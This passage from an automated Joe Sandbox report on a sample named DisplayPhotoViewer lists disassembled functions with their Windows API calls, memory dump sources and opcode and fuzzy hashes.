                                                                                                    • Instruction Fuzzy Hash: 12F0F874A11219ABCF14DFA5E8C895EF7AAAB08308B50847AEC19D3204FA31DA009F54
                                                                                                    Function 11064950 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 96libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(00000000,00000000), ref: 11064A12
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: LibraryLoad
                                                                                                    • String ID: ??CTL32.DLL
                                                                                                    • API String ID: 1029625771-2984404022
                                                                                                    • Opcode ID: e10ec1178dd96e41399a91e4c8b3fa8f7e27920cc5c9d53088df5fcacf16577d
                                                                                                    • Instruction ID: edc831c9bac0710a2833f7ff5ed18347d73f9cc27f9899f53b7a2a43fc9132ba
                                                                                                    • Opcode Fuzzy Hash: e10ec1178dd96e41399a91e4c8b3fa8f7e27920cc5c9d53088df5fcacf16577d
                                                                                                    • Instruction Fuzzy Hash: 1831F572A04255EFD711CF19DC40B5AF7E8FB45324F0586A9ED18D7380E731A801CBA1
                                                                                                    Function 11025890 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDriveTypeA.KERNEL32(?), ref: 110258BD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: DriveType
                                                                                                    • String ID: ?:\
                                                                                                    • API String ID: 338552980-2533537817
                                                                                                    • Opcode ID: 268953c2f23033925898edad21c6d672c896577a9090c4bc1e377c4f4053fe1a
                                                                                                    • Instruction ID: d31342550d5cf5955897a0d199b4155fffd08261177713a46b1b6ae3021f9349
                                                                                                    • Opcode Fuzzy Hash: 268953c2f23033925898edad21c6d672c896577a9090c4bc1e377c4f4053fe1a
                                                                                                    • Instruction Fuzzy Hash: C9F02461C443D92AEB22DE60D4406C6BFD94F02269F54C8CED8DA52441F2F2E1888BA1
                                                                                                    Function 1113C580 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18libraryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(NSMTRACE,?,1102C724,110252D0,0BA6C1B8,?,?,?,00000100,?,?,00000009), ref: 1113C599
                                                                                                      • Part of subcall function 1113B8F0: GetModuleHandleA.KERNEL32(NSMTRACE,11189A50), ref: 1113B90A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: HandleLibraryLoadModule
                                                                                                    • String ID: NSMTRACE
                                                                                                    • API String ID: 4133054770-4175627554
                                                                                                    • Opcode ID: a2ffb72ffc09aaeacd28c67883b9a122d1ca7e81eddb3afb4529a25f7f236f93
                                                                                                    • Instruction ID: 408c1d615ebbab9f82e2bea2d554aa0f1c95d530934033219aae1b43a4083b8d
                                                                                                    • Opcode Fuzzy Hash: a2ffb72ffc09aaeacd28c67883b9a122d1ca7e81eddb3afb4529a25f7f236f93
                                                                                                    • Instruction Fuzzy Hash: BED012346912678AD7125ADAA590238FBD4B78432E300007AD916C2E48EB20D8008B19
                                                                                                    Function 1105BD20 Relevance: 3.2, APIs: 2, Instructions: 169COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 111077A0: _malloc.LIBCMT ref: 111077B9
                                                                                                      • Part of subcall function 111077A0: wsprintfA.USER32 ref: 111077D4
                                                                                                      • Part of subcall function 111077A0: _memset.LIBCMT ref: 111077F7
                                                                                                    • std::exception::exception.LIBCMT ref: 1105BDC3
                                                                                                    • __CxxThrowException@8.LIBCMT ref: 1105BDD8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                    • String ID:
                                                                                                    • API String ID: 1338273076-0
                                                                                                    • Opcode ID: 458f707eca7cc7dabb748e2a28a73304366b7ed7de3b855394f888a64eec1dd7
                                                                                                    • Instruction ID: a1dee9e6324aa9e5cf750fbb168aab0da4794815e51fdd4fd48c7d55def21bc5
                                                                                                    • Opcode Fuzzy Hash: 458f707eca7cc7dabb748e2a28a73304366b7ed7de3b855394f888a64eec1dd7
                                                                                                    • Instruction Fuzzy Hash: 5551A0B6A00609AFDB50CF54C840E9AFBEAEF89314F14855EE9199B340E771F900CBE1
                                                                                                    Function 11070670 Relevance: 3.1, APIs: 2, Instructions: 80COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _memset.LIBCMT ref: 110706CF
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,11189201,0B2220C0), ref: 11070739
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FreeLibrary_memset
                                                                                                    • String ID:
                                                                                                    • API String ID: 1654520187-0
                                                                                                    • Opcode ID: 5f9d4fded7a4aebe457466206f233a9b98f5644a516551f8f3b8d73233da3a6d
                                                                                                    • Instruction ID: b4517536591866d176506ab9d34d2c09925eccc7506cffdd9ee3597e20039527
                                                                                                    • Opcode Fuzzy Hash: 5f9d4fded7a4aebe457466206f233a9b98f5644a516551f8f3b8d73233da3a6d
                                                                                                    • Instruction Fuzzy Hash: 5321C576E00229A7D710DE54EC80BDFFBACFB89354F5042AAE90997240EB715E50CBE1
                                                                                                    Function 1105AE20 Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _malloc_memmove
                                                                                                    • String ID:
                                                                                                    • API String ID: 1183979061-0
                                                                                                    • Opcode ID: cc8697e162e3434f68ad300f31a639764fd201fd1f059a6e11f2fa5353e62f75
                                                                                                    • Instruction ID: 82a9df6770799930052105fa226fbb1c216193503dc12c146611146c4bf91a0b
                                                                                                    • Opcode Fuzzy Hash: cc8697e162e3434f68ad300f31a639764fd201fd1f059a6e11f2fa5353e62f75
                                                                                                    • Instruction Fuzzy Hash: E7F0C8B9E04652AF9782CF2D9844897FBEDDF5A65830480A6F999CB312D631EC0587F0
                                                                                                    Function 11083B10 Relevance: 3.0, APIs: 2, Instructions: 42COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • _memset.LIBCMT ref: 11083B2F
                                                                                                    • InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,1106C2D3,00000000,00000000,1117757E,000000FF), ref: 11083BA0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalInitializeSection_memset
                                                                                                    • String ID:
                                                                                                    • API String ID: 453477542-0
                                                                                                    • Opcode ID: 811983831a9b049a6b6bfd64228a3df54c8b55fd956acab057332e78f713cf92
                                                                                                    • Instruction ID: ed86ddefb115c270eed9fa94c2b68f769037bd35a9f0937a366c6d193e9c87ff
                                                                                                    • Opcode Fuzzy Hash: 811983831a9b049a6b6bfd64228a3df54c8b55fd956acab057332e78f713cf92
                                                                                                    • Instruction Fuzzy Hash: 861154B0912B048FC3A4CF7A88816C7FBE9BB49314F90892ED5EEC2200DB716560CF94
                                                                                                    Function 1113A7B0 Relevance: 3.0, APIs: 2, Instructions: 34windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1113A7D1
                                                                                                    • ExtractIconExA.SHELL32(?,00000000,000601D7,0004052B,00000001), ref: 1113A808
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ExtractFileIconModuleName
                                                                                                    • String ID:
                                                                                                    • API String ID: 3911389742-0
                                                                                                    • Opcode ID: ffaa9e24674eed2b7a188887e5c91b4b0fd0de5efb600298c4b3429a991fa8e8
                                                                                                    • Instruction ID: f89515c018f80163da91d4b932c0702da16e94e843d2c50d7bafbc3ccd6a0849
                                                                                                    • Opcode Fuzzy Hash: ffaa9e24674eed2b7a188887e5c91b4b0fd0de5efb600298c4b3429a991fa8e8
                                                                                                    • Instruction Fuzzy Hash: E1F096786551185FE704CBA4C956FBDB3F8E784708F408169ED5297284CD7059848764
                                                                                                    Function 10705F67 Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • HeapCreate.KERNEL32(00000000,00001000,00000000,10705C23,00000001), ref: 10705F78
                                                                                                      • Part of subcall function 10705E1F: GetVersionExA.KERNEL32 ref: 10705E3E
                                                                                                    • HeapDestroy.KERNEL32 ref: 10705FB7
                                                                                                      • Part of subcall function 1070613E: HeapAlloc.KERNEL32(00000000,00000140,10705FA0,000003F8), ref: 1070614B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3142566254.0000000010700000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142766293.0000000010710000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142810095.0000000010712000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142851685.0000000010714000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142905527.0000000010722000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142942985.0000000010724000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10700000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$AllocCreateDestroyVersion
                                                                                                    • String ID:
                                                                                                    • API String ID: 2507506473-0
                                                                                                    • Opcode ID: ec1bd4b4e43dbc614b673e36d6da99fb5a9e51dfef66a0e936108a12f2e13c70
                                                                                                    • Instruction ID: 4b004725c68517a385d36cc5e969694199c16aad3d11629d2ae2d05f84d08eb7
                                                                                                    • Opcode Fuzzy Hash: ec1bd4b4e43dbc614b673e36d6da99fb5a9e51dfef66a0e936108a12f2e13c70
                                                                                                    • Instruction Fuzzy Hash: CFF09B70A15353DAE70017309D8971A36D4EB0D781F228A65F500C90DCEFB4E5819B16
                                                                                                    Function 1113B180 Relevance: 2.6, APIs: 2, Instructions: 58sleepCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 1113B0A0: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?), ref: 1113B0C7
                                                                                                      • Part of subcall function 111592B7: __fsopen.LIBCMT ref: 111592C4
                                                                                                    • GetLastError.KERNEL32(?,0BA6C1B8,000000FF,0BA62AB0), ref: 1113B1B5
                                                                                                    • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,0BA6C1B8,000000FF,0BA62AB0), ref: 1113B1C5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3768737497-0
                                                                                                    • Opcode ID: dae3624ce01fb042922a65e0a34b1ddbeb1f8b1ef21292a8cf894757903d37e4
                                                                                                    • Instruction ID: 342d05eea744d5aa4667aac21bd25093e4a099da11b6d9d9dc2088a8b72355dd
                                                                                                    • Opcode Fuzzy Hash: dae3624ce01fb042922a65e0a34b1ddbeb1f8b1ef21292a8cf894757903d37e4
                                                                                                    • Instruction Fuzzy Hash: AA110475910119ABDB119F95EDC0A6EF3B8FB8667AF004264EC0597208F734AE0487E2
                                                                                                    Function 10001BF0 Relevance: 1.7, APIs: 1, Instructions: 186COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 1027C531: _free.LIBCMT ref: 1027C544
                                                                                                    • _FreeImage_Unload@4.FREEIMAGE(?), ref: 10001DE6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3127485200.0000000010001000.00000020.00000001.01000000.00000009.sdmp, Offset: 10000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3127459389.0000000010000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000102AC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000102F0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000102F5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.0000000010362000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.000000001036F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.0000000010371000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.000000001037F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000103A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000103B1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000103B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000103C1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3134028906.00000000103E1000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3138272696.000000001041B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3138452194.000000001045E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3138495106.000000001045F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3141998762.000000001059E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142048918.00000000105A0000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142110889.00000000105A4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142150062.00000000105A5000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142197001.00000000105A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142253419.00000000105A9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3142293852.00000000105AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_10000000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeImage_Unload@4_free
                                                                                                    • String ID:
                                                                                                    • API String ID: 3207628011-0
                                                                                                    • Opcode ID: 73aa305a511225a13595f2bd642f2ef5a2f4810be64aa0453c1b7658bf1f110b
                                                                                                    • Instruction ID: 03ce1cabda77d57b50c985f9493fe1dba15da5d11f7eccd691666960f6e75faa
                                                                                                    • Opcode Fuzzy Hash: 73aa305a511225a13595f2bd642f2ef5a2f4810be64aa0453c1b7658bf1f110b
                                                                                                    • Instruction Fuzzy Hash: 9361A075A406559FF701CB28C485F9ABBE2EF453C4F5AC0A9E4489B2A6D771FC50CB80
                                                                                                    Function 107046F0 Relevance: 1.6, APIs: 1, Instructions: 80memoryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00000000,10712290,?), ref: 107047D7
                                                                                                      • Part of subcall function 10707967: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,10708E6F,00000002,?,?,5C74726F,1070599D,?,107059D7,10712290,10712290,00000040,10702706), ref: 107079A4
                                                                                                      • Part of subcall function 10707967: EnterCriticalSection.KERNEL32(?,?,?,10708E6F,00000002,?,?,5C74726F,1070599D,?,107059D7,10712290,10712290,00000040,10702706,?), ref: 107079BF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3142604836.0000000010701000.00000020.00000001.01000000.00000018.sdmp, Offset: 10700000, based on PE: true
